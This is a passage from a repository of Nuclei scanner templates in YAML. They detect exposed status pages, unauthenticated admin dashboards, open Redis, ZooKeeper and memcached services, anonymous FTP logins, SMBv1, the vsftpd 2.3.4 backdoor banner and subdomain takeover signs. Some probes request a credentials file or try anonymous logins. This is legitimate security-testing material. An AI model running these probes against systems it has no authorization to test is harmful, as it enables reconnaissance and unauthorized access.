| - "{{BaseURL}}" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: word 18 | part: body 19 | words: 20 | - 'concrete5 has encountered an issue' -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/nginx/nginx-status.yaml: -------------------------------------------------------------------------------- 1 | id: nginx-status 2 | 3 | info: 4 | name: Nginx Status Page 5 | author: dhiyaneshDK 6 | severity: info 7 | tags: misconfig,nginx,status 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/nginx_status" 13 | - "{{BaseURL}}/nginx-status" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Active connections:' 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/nginx/nginx-vhost-traffic-status.yaml: -------------------------------------------------------------------------------- 1 | id: nginx-vhost-traffic-status 2 | 3 | info: 4 | name: Nginx Vhost Traffic Status 5 | author: geeknik 6 | severity: low 7 | reference: 8 | - https://github.com/vozlt/nginx-module-vts 9 | tags: status,nginx,misconfig 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/status" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Nginx Vhost Traffic Status" 21 | - "Host" 22 | - "Zone" 23 | condition: and 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/node-exporter-metrics.yaml: -------------------------------------------------------------------------------- 1 | id: node-exporter-metrics 2 | 3 | info: 4 | name: Detect Node Exporter Metrics 5 | author: pussycat0x 6 | severity: low 7 | description: Information Disclosure of Garbage Collection 8 | tags: node,exposure,debug 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/metrics" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: body 19 | words: 20 | - "node_cooling_device" 21 | - "node_network" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/php-fpm-status.yaml: -------------------------------------------------------------------------------- 1 | id: php-fpm-status 2 | 3 | info: 4 | name: PHP-FPM Status 5 | author: geeknik 6 | severity: info 7 | tags: config 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/status?full" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'pool:' 19 | - 'process manager:' 20 | - 'start time:' 21 | - 'pid:' 22 | condition: and 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/prometheus/prometheus-log.yaml: -------------------------------------------------------------------------------- 1 | id: prometheus-log 2 | 3 | info: 4 | name: Exposed Prometheus 5 | author: dhiyaneshDK 6 | severity: low 7 | tags: prometheus 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/prometheus" 13 | - "{{BaseURL}}/actuator/prometheus" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'gateway_request_total' 20 | - 'logback_events_total' 21 | condition: or 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/rack-mini-profiler.yaml: -------------------------------------------------------------------------------- 1 | id: rack-mini-profiler 2 | 3 | info: 4 | name: rack-mini-profiler environment information disclosure 5 | author: vzamanillo 6 | severity: high 7 | tags: config,debug,rails 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/?pp=env" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Rack Environment" 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/salesforce-aura.yaml: -------------------------------------------------------------------------------- 1 | id: salesforce-aura 2 | 3 | info: 4 | name: Detect the exposure of Salesforce Lightning aura API 5 | author: aaron_costello (@ConspiracyProof) 6 | severity: info 7 | reference: 8 | - https://www.enumerated.de/index/salesforce 9 | tags: aura,unauth,salesforce,exposure 10 | 11 | requests: 12 | - method: POST 13 | path: 14 | - "{{BaseURL}}/aura" 15 | - "{{BaseURL}}/s/sfsites/aura" 16 | - "{{BaseURL}}/sfsites/aura" 17 | 18 | body: "{}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - 'aura:invalidSession' 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/sap/sap-directory-listing.yaml: -------------------------------------------------------------------------------- 1 | id: sap-directory-listing 2 | 3 | info: 4 | name: SAP Directory Listing 5 | author: dhiyaneshDK 6 | severity: medium 7 | tags: sap,listing,misconfig 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/irj/go/km/navigation/' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'title="~system"' 19 | - 'NetWeaver' 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | 26 | - type: word 27 | words: 28 | - "text/html" 29 | part: header -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/service-pwd.yaml: -------------------------------------------------------------------------------- 1 | id: service-pwd 2 | 3 | info: 4 | name: Service password file 5 | author: pussycat0x 6 | severity: high 7 | description: Searches for sensitive service.pwd file. 8 | reference: 9 | - https://www.exploit-db.com/ghdb/7256 10 | tags: exposure,listing,service 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/_vti_pvt/service.pwd" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - "# -FrontPage-" 22 | part: body 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/sitecore-debug-page.yaml: -------------------------------------------------------------------------------- 1 | id: sitecore-debug-page 2 | 3 | info: 4 | name: SiteCore Debug Page 5 | author: dhiyaneshDK 6 | severity: low 7 | metadata: 8 | shodan-query: http.title:"Welcome to Sitecore" 9 | tags: debug,sitecore 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/sitecore/'" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'extranet\Anonymous' 21 | 22 | - type: status 23 | status: 24 | - 404 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/solr-query-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: solr-admin-query 2 | 3 | info: 4 | name: Solr Admin Query Page 5 | author: dhiyaneshDK 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/ghdb/5856 9 | tags: solr,unauth 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/admin/' 15 | - '{{BaseURL}}/solr/admin/' 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - 'Solr admin page' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/tcpconfig.yaml: -------------------------------------------------------------------------------- 1 | id: tcpconfig 2 | 3 | info: 4 | name: TCP Config Information Exposed 5 | author: dhiyaneshDK 6 | severity: low 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6782 9 | tags: logs,config 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/tcpconfig.html" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "TCP/IP Configuration" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/unauthenticated-alert-manager.yaml: -------------------------------------------------------------------------------- 1 | id: unauthenticated-alert-manager 2 | 3 | info: 4 | name: Unauthenticated Alert Manager 5 | author: dhiyaneshDK 6 | severity: high 7 | reference: 8 | - https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22 9 | tags: unauth,alertmanager 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/#/alerts" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'Alertmanager' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/unauthenticated-lansweeper.yaml: -------------------------------------------------------------------------------- 1 | id: unauthenticated-lansweeper 2 | 3 | info: 4 | name: Unauthenticated Lansweeper Instance 5 | author: divya_mudgal 6 | severity: high 7 | tags: lansweeper,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Default.aspx" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Main page - Lansweeper" -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/unauthenticated-popup-upload.yaml: -------------------------------------------------------------------------------- 1 | id: unauthenticated-popup-upload 2 | 3 | info: 4 | name: Unauthenticated Popup File Uploader 5 | author: DhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6671 9 | tags: fileupload,upload 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/RichWidgets/Popup_Upload.aspx" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Popup Upload" 21 | part: body 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/unauthenticated-prtg.yaml: -------------------------------------------------------------------------------- 1 | id: unauthenticated-prtg 2 | 3 | info: 4 | name: Unauthenticated PRTG Traffic Grapher 5 | author: dhiyaneshDK 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/ghdb/5808 9 | tags: config,unauth,prtg 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/sensorlist.htm" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'PRTG Traffic Grapher' 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/unauthenticated-tensorboard.yaml: -------------------------------------------------------------------------------- 1 | id: unauthenticated-tensorboard 2 | 3 | info: 4 | name: Unauthenticated Tensorboard by Tensorflow 5 | author: dhiyaneshDk 6 | severity: high 7 | tags: tensorflow,tensorboard,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/data/plugins_listing' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'scalars' 19 | - 'loading_mechanism' 20 | - 'custom_scalars' 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/unauthorized-hp-printer.yaml: -------------------------------------------------------------------------------- 1 | id: unauthorized-hp-printer 2 | 3 | info: 4 | name: Unauthorized HP Printer 5 | author: pussycat0x 6 | severity: high 7 | tags: hp,iot,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/SSI/Auth/ip_snmp.htm" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "HP" 19 | - "

SNMP

" 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/unauthorized-puppet-node-manager-detect.yaml: -------------------------------------------------------------------------------- 1 | id: unauthorized-puppet-node-manager 2 | 3 | info: 4 | name: Pupet Node Manager 5 | author: pussycat0x 6 | severity: medium 7 | metadata: 8 | fofa-dork: 'app="puppet-Node-Manager"' 9 | tags: node,misconfig 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'Nodes' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/ups-status.yaml: -------------------------------------------------------------------------------- 1 | id: ups-status 2 | 3 | info: 4 | name: Multimon UPS status page 5 | author: dhiyaneshDK 6 | severity: low 7 | reference: 8 | - https://www.exploit-db.com/ghdb/752 9 | tags: logs,status 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/cgi-bin/apcupsd/multimon.cgi" 15 | - "{{BaseURL}}/cgi-bin/multimon.cgi" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - "Multimon: UPS Status Page" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/viewpoint-system-status.yaml: -------------------------------------------------------------------------------- 1 | id: viewpoint-system-status 2 | 3 | info: 4 | name: ViewPoint System Status 5 | author: dhiyaneshDK 6 | severity: low 7 | reference: 8 | - https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22 9 | tags: status,exposures,viewpoint 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'ViewPoint System Status' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/wamp-server-configuration.yaml: -------------------------------------------------------------------------------- 1 | id: wamp-server-configuration 2 | 3 | info: 4 | name: default-wamp-server-page 5 | author: pussycat0x 6 | severity: medium 7 | description: Wamp default page will expose sensitive configuration and vhosts. 8 | reference: https://www.exploit-db.com/ghdb/6891. 9 | tags: wamp,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: dsl 19 | dsl: 20 | - 'contains(tolower(body), "wampserver")' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/wamp-xdebug-detect.yaml: -------------------------------------------------------------------------------- 1 | id: wamp-xdebug-detect 2 | 3 | info: 4 | name: WAMP xdebug 5 | author: e_schultze_ 6 | severity: info 7 | reference: 8 | - https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py 9 | tags: debug,config,wamp 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/?phpinfo=-1" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'xdebug.remote_connect_backOnOn' 20 | part: body 21 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/wildcard-postmessage.yaml: -------------------------------------------------------------------------------- 1 | id: wildcard-postmessage 2 | 3 | info: 4 | name: Wildcard postMessage detection 5 | author: pdteam 6 | severity: info 7 | reference: 8 | - https://jlajara.gitlab.io/web/2020/06/12/Dom_XSS_PostMessage.html 9 | tags: xss,postmessage 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - postMessage\([a-zA-Z]+,["']\*["']\) 20 | -------------------------------------------------------------------------------- /web/pocs/nuclei/misconfiguration/zabbix-error.yaml: -------------------------------------------------------------------------------- 1 | id: zabbix-error 2 | 3 | info: 4 | name: Zabbix Error 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://www.shodan.io/search?query=http.title%3A%22Warning+%5Brefreshed+every+30+sec.%5D%22 9 | tags: zabbix,misconfig 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'Warning [refreshed every 30 sec.]' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/clickhouse-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: clickhouse-unauth 2 | 3 | info: 4 | name: Unauth ClickHouse Disclosure 5 | author: lu4nx 6 | severity: high 7 | tags: network,clickhouse,unauth 8 | 9 | network: 10 | - inputs: 11 | # 0011436c69636b486f75736520636c69656e741508b1a9030007 is header 12 | # 64656661756c74 = default 13 | - data: 0011436c69636b486f75736520636c69656e741508b1a903000764656661756c7400 14 | type: hex 15 | 16 | host: 17 | - "{{Hostname}}" 18 | - "{{Host}}:9000" 19 | 20 | read-size: 100 21 | matchers: 22 | - type: word 23 | words: 24 | - "ClickHouse" 25 | - "UTC" 26 | condition: and -------------------------------------------------------------------------------- /web/pocs/nuclei/network/detect-rsyncd.yaml: -------------------------------------------------------------------------------- 1 | id: detect-rsyncd 2 | 3 | info: 4 | name: Detect rsyncd 5 | author: vsh00t,geeknik 6 | severity: info 7 | reference: 8 | - https://linux.die.net/man/1/rsync 9 | tags: network,rsyncd 10 | 11 | network: 12 | - inputs: 13 | - data: "?\r\n" 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Host}}:873" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "RSYNCD: " 23 | - "ERROR: protocol startup error" 24 | condition: and 25 | 26 | extractors: 27 | - type: regex 28 | regex: 29 | - 'RSYNCD: \d\d.\d' 30 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/expn-mail-detect.yaml: -------------------------------------------------------------------------------- 1 | id: expn-mail-detect 2 | 3 | info: 4 | name: EXPN Mail Server Detect 5 | author: r3dg33k 6 | severity: info 7 | tags: mail,expn,network 8 | 9 | network: 10 | - inputs: 11 | - data: "65686c6f20636865636b746c730a" 12 | type: hex 13 | read-size: 2048 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Host}}:25" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "250-EXPN" -------------------------------------------------------------------------------- /web/pocs/nuclei/network/exposed-redis.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-redis 2 | 3 | info: 4 | name: Redis Unauth Server 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://redis.io/topics/security 9 | tags: network,redis,unauth 10 | 11 | network: 12 | - inputs: 13 | - data: "info\r\nquit\r\n" 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Host}}:6379" 18 | read-size: 2048 19 | 20 | matchers-condition: and 21 | matchers: 22 | - type: word 23 | words: 24 | - "redis_version" 25 | - type: word 26 | negative: true 27 | words: 28 | - "redis_mode:sentinel" 29 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/exposed-zookeeper.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-zookeeper 2 | 3 | info: 4 | name: ZooKeeper Unauth Server 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://zookeeper.apache.org/security.html 9 | tags: network,zookeeper,unauth 10 | 11 | network: 12 | - inputs: 13 | - data: "envi\r\nquit\r\n" 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Host}}:2181" 18 | read-size: 2048 19 | 20 | matchers: 21 | - type: word 22 | words: 23 | - "zookeeper.version" 24 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/ftp-default-credentials.yaml: -------------------------------------------------------------------------------- 1 | id: ftp-default-credentials 2 | 3 | info: 4 | name: FTP Service with anonymous Login 5 | author: pussycat0x 6 | severity: info 7 | tags: network,ftp,default-login,service 8 | 9 | network: 10 | 11 | - inputs: 12 | - data: "USER anonymous\r\nPASS anonymous\r\n" 13 | host: 14 | - "{{Hostname}}" 15 | - "{{Host}}:21" 16 | 17 | matchers: 18 | - type: word 19 | words: 20 | - "230" 21 | - "Anonymous user logged in" 22 | condition: and 23 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/iplanet-imap-detect.yaml: -------------------------------------------------------------------------------- 1 | id: iplanet-imap-detect 2 | 3 | info: 4 | name: iplanet messaging imap protocol 5 | author: pussycat0x 6 | severity: info 7 | metadata: 8 | fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap" 9 | tags: network,imap 10 | 11 | network: 12 | - inputs: 13 | - data: "\n" 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Host}}:110" 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "iPlanet Messaging Server" 22 | 23 | extractors: 24 | - type: regex 25 | part: body 26 | regex: 27 | - "iPlanet Messaging Server ([0-9.]+)" 28 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/java-rmi-detect.yaml: -------------------------------------------------------------------------------- 1 | id: java-rmi-detect 2 | 3 | info: 4 | name: Detect Java RMI Protocol 5 | author: F1tz 6 | severity: info 7 | tags: network,rmi,java 8 | 9 | network: 10 | - inputs: 11 | - data: "{{hex_decode('4a524d4900024b')}}" 12 | 13 | host: 14 | - "{{Hostname}}" 15 | read-size: 1024 16 | 17 | matchers: 18 | - type: regex 19 | part: raw 20 | regex: 21 | - "^N\\x00\\x0e(\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00" 22 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/memcached-stats.yaml: -------------------------------------------------------------------------------- 1 | id: memcached-stats 2 | 3 | info: 4 | name: Memcached stats disclosure 5 | author: pdteam 6 | severity: low 7 | tags: network,memcached 8 | 9 | network: 10 | - inputs: 11 | - data: "stats\r\n\r\nquit\r\n" 12 | 13 | host: 14 | - "{{Hostname}}" 15 | - "{{Host}}:11211" 16 | read-size: 2048 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "STAT " -------------------------------------------------------------------------------- /web/pocs/nuclei/network/mongodb-detect.yaml: -------------------------------------------------------------------------------- 1 | id: mongodb-detect 2 | 3 | info: 4 | name: MongoDB Detection 5 | author: pdteam 6 | severity: info 7 | reference: 8 | - https://github.com/orleven/Tentacle 9 | tags: network,mongodb 10 | 11 | network: 12 | - inputs: 13 | - data: 3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000 14 | type: hex 15 | 16 | host: 17 | - "{{Hostname}}" 18 | - "{{Host}}:27017" 19 | read-size: 2048 20 | 21 | matchers: 22 | - type: word 23 | words: 24 | - "logicalSessionTimeout" 25 | - "localTime" -------------------------------------------------------------------------------- /web/pocs/nuclei/network/printers-info-leak.yaml: -------------------------------------------------------------------------------- 1 | id: printers-info-leak 2 | 3 | info: 4 | name: Unauthorized Printer Access 5 | author: pussycat0x 6 | severity: info 7 | reference: 8 | - https://book.hacktricks.xyz/pentesting/9100-pjl 9 | tags: network,iot,printer 10 | 11 | network: 12 | - inputs: 13 | - data: "@PJL INFO STATUS\n" 14 | host: 15 | - "{{Host}}:9100" 16 | matchers: 17 | - type: word 18 | words: 19 | - "CODE=" 20 | - "PJL INFO STATUS" 21 | condition: and 22 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/sap-router.yaml: -------------------------------------------------------------------------------- 1 | id: sap-router 2 | 3 | info: 4 | name: SAPRouter Detection 5 | author: randomstr1ng 6 | severity: info 7 | tags: network,sap 8 | 9 | network: 10 | - inputs: 11 | - data: 57484f415245594f553f0a 12 | type: hex 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Host}}:3299" 17 | read-size: 1024 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "SAProuter" -------------------------------------------------------------------------------- /web/pocs/nuclei/network/smb-v1-detection.yaml: -------------------------------------------------------------------------------- 1 | id: smb-v1-detection 2 | 3 | info: 4 | name: SMB-V1 Detection 5 | author: pussycat0x 6 | severity: low 7 | reference: 8 | - https://stealthbits.com/blog/what-is-smbv1-and-why-you-should-disable-it/ 9 | tags: network,windows,smb,service 10 | 11 | network: 12 | - inputs: 13 | - data: 00000031ff534d4272000000001845680000000000000000000000000000be2200000100000e00024e54204c4d20302e3132000200 14 | type: hex 15 | 16 | host: 17 | - "{{Hostname}}" 18 | - "{{Host}}:445" 19 | 20 | matchers: 21 | - type: word 22 | words: 23 | - "SMBr" -------------------------------------------------------------------------------- /web/pocs/nuclei/network/smtp-detection.yaml: -------------------------------------------------------------------------------- 1 | id: smtp-service-detection 2 | 3 | info: 4 | name: SMTP Service Detection 5 | author: pussycat0x 6 | severity: info 7 | tags: network,service,smtp 8 | 9 | network: 10 | - inputs: 11 | - data: "\r\n" 12 | host: 13 | - "{{Hostname}}" 14 | - "{{Host}}:25" 15 | matchers: 16 | - type: word 17 | words: 18 | - "SMTP" 19 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/starttls-mail-detect.yaml: -------------------------------------------------------------------------------- 1 | id: starttls-mail-detect 2 | 3 | info: 4 | name: STARTTLS Mail Server Detect 5 | author: r3dg33k 6 | severity: info 7 | tags: mail,starttls,network 8 | 9 | network: 10 | - inputs: 11 | - data: "65686c6f20636865636b746c730a" 12 | type: hex 13 | read-size: 2048 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Host}}:25" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "250-STARTTLS" 23 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/tidb-native-password.yaml: -------------------------------------------------------------------------------- 1 | id: tidb-native-password 2 | 3 | info: 4 | name: TiDB DB with enabled native password 5 | author: lu4nx 6 | severity: info 7 | description: TiDB is fully compatible with the MySQL 5.7 protocol and the common features and syntax of MySQL 5.7. TiDB instance with enabled native password support prone vulnerable for password brute-force attack. 8 | tags: network,tidb,bruteforce,db 9 | 10 | network: 11 | - host: 12 | - "{{Hostname}}" 13 | - "{{Host}}:4000" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "mysql_native_password" 19 | - "TiDB" 20 | condition: and 21 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/totemomail-smtp-detect.yaml: -------------------------------------------------------------------------------- 1 | id: totemomail-smtp-detect 2 | 3 | info: 4 | name: Totemomail SMTP Server Detect 5 | author: princechaddha 6 | severity: info 7 | tags: mail,smtp,network,totemomail 8 | 9 | network: 10 | - inputs: 11 | - data: "\r\n" 12 | read-size: 2048 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Host}}:25" 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "totemomail" 22 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/unauth-ftp.yaml: -------------------------------------------------------------------------------- 1 | id: unauth-ftp 2 | 3 | info: 4 | name: FTP Anonymous Login 5 | author: C3l3si4n 6 | severity: medium 7 | reference: 8 | - https://tools.ietf.org/html/rfc2577 9 | tags: network,ftp 10 | 11 | network: 12 | - inputs: 13 | - data: "USER anonymous\r\nPASS nuclei\r\n" 14 | 15 | host: 16 | - "{{Host}}:21" 17 | - "{{Hostname}}" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "Anonymous access allowed," 23 | part: response -------------------------------------------------------------------------------- /web/pocs/nuclei/network/vsftpd-detection.yaml: -------------------------------------------------------------------------------- 1 | id: vsftpd-detection 2 | 3 | info: 4 | name: VSFTPD v2.3.4 Backdoor Command Execution 5 | author: pussycat0x 6 | severity: critical 7 | reference: 8 | - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ 9 | tags: network,vsftpd,ftp,backdoor 10 | 11 | network: 12 | - inputs: 13 | - data: "USER anonymous\r\nPASS pussycat0x\r\n" 14 | 15 | host: 16 | - "{{Host}}:21" 17 | - "{{Hostname}}" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "vsFTPd 2.3.4" 23 | -------------------------------------------------------------------------------- /web/pocs/nuclei/network/weblogic-iiop-detect.yaml: -------------------------------------------------------------------------------- 1 | id: weblogic-iiop-detect 2 | 3 | info: 4 | name: Detect Weblogic IIOP Protocol 5 | author: F1tz 6 | severity: info 7 | description: Check IIOP protocol status. 8 | tags: network,weblogic 9 | 10 | network: 11 | - inputs: 12 | - data: "{{hex_decode('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')}}" 13 | 14 | host: 15 | - "{{Hostname}}" 16 | read-size: 1024 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | words: 22 | - "GIOP" 23 | - "weblogic" 24 | condition: and 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/ssl/expired-ssl.yaml: -------------------------------------------------------------------------------- 1 | id: expired-ssl 2 | 3 | info: 4 | name: Expired SSL Certificate 5 | author: pdteam 6 | severity: low 7 | tags: ssl 8 | 9 | ssl: 10 | - address: "{{Host}}:{{Port}}" 11 | matchers: 12 | - type: dsl 13 | dsl: 14 | - "unixtime() > not_after" 15 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/aftership-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: aftership-takeover 2 | 3 | info: 4 | name: Aftership Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Oops.

The page you're looking for doesn't exist. -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/agilecrm-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: agilecrm-takeover 2 | 3 | info: 4 | name: agilecrm takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Sorry, this page is no longer available. -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/aha-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: aha-takeover 2 | 3 | info: 4 | name: Aha Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 